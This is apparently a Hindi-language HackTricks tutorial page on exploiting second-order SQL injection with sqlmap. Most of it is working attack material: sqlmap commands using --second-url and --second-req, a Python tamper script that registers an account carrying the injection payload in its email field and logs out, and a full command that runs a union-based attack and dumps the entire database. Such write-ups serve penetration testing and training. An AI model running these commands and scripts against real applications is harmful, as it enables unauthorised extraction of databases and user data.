8.4 KiB
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- The PEASS Family की खोज करें, हमारा एक्सक्लूसिव NFTs संग्रह
- 💬 Discord group में शामिल हों या telegram group में या Twitter पर 🐦 @carlospolopm को फॉलो करें.
- HackTricks और HackTricks Cloud github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
SQLMap Second Order SQLis का शोषण कर सकता है।
आपको प्रदान करना होगा:
- वह रिक्वेस्ट जहां sqlinjection payload सहेजा जाएगा
- वह रिक्वेस्ट जहां payload निष्पादित किया जाएगा
SQL injection payload सहेजने वाली रिक्वेस्ट को sqlmap में किसी अन्य इंजेक्शन की तरह इंगित किया जाता है। रिक्वेस्ट जहां sqlmap इंजेक्शन के आउटपुट/निष्पादन को पढ़ सकता है, उसे --second-url
या --second-req
के साथ इंगित किया जा सकता है यदि आपको फाइल से पूरी रिक्वेस्ट इंगित करने की आवश्यकता हो।
सरल दूसरे क्रम का उदाहरण:
#Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
#Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt
कई मामलों में यह पर्याप्त नहीं होगा क्योंकि आपको पेलोड भेजने और एक अलग पृष्ठ तक पहुँचने के अलावा अन्य क्रियाएं करनी होंगी।
जब यह आवश्यक हो, आप sqlmap tamper का उपयोग कर सकते हैं। उदाहरण के लिए निम्नलिखित स्क्रिप्ट एक नया उपयोगकर्ता रजिस्टर करेगी sqlmap पेलोड का उपयोग करते हुए ईमेल के रूप में और लॉगआउट करेगी।
#!/usr/bin/env python
import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def login_account(payload):
proxies = {'http':'http://127.0.0.1:8080'}
cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
url = "http://10.10.10.10/create.php"
pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
url = "http://10.10.10.10/exit.php"
pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
login_account(payload)
return payload
एक SQLMap tamper हमेशा एक पेलोड के साथ इंजेक्शन प्रयास शुरू करने से पहले निष्पादित किया जाता है और इसे एक पेलोड वापस करना होता है। इस मामले में हमें पेलोड की परवाह नहीं है लेकिन हमें कुछ अनुरोध भेजने की परवाह है, इसलिए पेलोड को बदला नहीं जाता है।
तो, अगर किसी कारण से हमें दूसरे क्रम के SQL इंजेक्शन का शोषण करने के लिए एक अधिक जटिल प्रवाह की आवश्यकता है जैसे:
- "ईमेल" फील्ड में SQLi पेलोड के साथ एक खाता बनाएं
- लॉगआउट करें
- उस खाते के साथ लॉगिन करें (login.txt)
- SQL इंजेक्शन निष्पादित करने के लिए एक अनुरोध भेजें (second.txt)
यह sqlmap लाइन मदद करेगी:
sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
##########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- The PEASS Family की खोज करें, हमारा एक्सक्लूसिव NFTs का संग्रह
- 💬 Discord group में शामिल हों या telegram group में या Twitter 🐦 पर मुझे फॉलो करें @carlospolopm.
- HackTricks के github repos और HackTricks Cloud में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।